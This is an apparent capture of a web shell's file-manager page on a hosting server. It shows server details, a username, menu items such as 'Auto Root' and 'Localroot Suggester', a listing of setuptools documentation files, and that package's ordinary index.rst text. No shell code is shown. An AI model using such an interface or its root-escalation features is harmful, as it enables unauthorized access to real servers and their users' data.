Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
python3-setuptools /
userguide /
Delete
Unzip
Name
Size
Permission
Date
Action
commands.rst
26.73
KB
-rw-r--r--
2021-02-01 15:39
datafiles.rst
7.69
KB
-rw-r--r--
2021-02-01 15:39
declarative_config.rst
8.48
KB
-rw-r--r--
2025-09-21 11:46
dependency_management.rst
9.72
KB
-rw-r--r--
2021-02-01 15:39
development_mode.rst
3.2
KB
-rw-r--r--
2021-02-01 15:39
distribution.rst
12.14
KB
-rw-r--r--
2021-02-01 15:39
entry_point.rst
5.12
KB
-rw-r--r--
2021-02-01 15:39
extension.rst
10.52
KB
-rw-r--r--
2021-02-01 15:39
functionalities_rewrite.rst
342
B
-rw-r--r--
2021-02-01 15:39
index.rst
1.12
KB
-rw-r--r--
2021-02-01 15:39
keywords.rst
9.18
KB
-rw-r--r--
2021-02-01 15:39
miscellaneous.rst
5.54
KB
-rw-r--r--
2021-02-01 15:39
package_discovery.rst
6.57
KB
-rw-r--r--
2021-02-01 15:39
quickstart.rst
7.56
KB
-rw-r--r--
2021-02-01 15:39
Save
Rename
================================================== Building and Distributing Packages with Setuptools ================================================== ``Setuptools`` is a collection of enhancements to the Python ``distutils`` that allow developers to more easily build and distribute Python packages, especially ones that have dependencies on other packages. Packages built and distributed using ``setuptools`` look to the user like ordinary Python packages based on the ``distutils``. Transition to PEP517 ==================== Since setuptools no longer serves as the default build tool, one must explicitly opt in (by providing a :file:`pyproject.toml` file) to use this library. The user facing part is provided by tools such as pip and backend interface is described :doc:`in this document <../build_meta>`. The quickstart provides an overview of the new workflow. .. toctree:: :maxdepth: 1 quickstart package_discovery entry_point dependency_management datafiles development_mode distribution extension declarative_config keywords commands functionalities_rewrite miscellaneous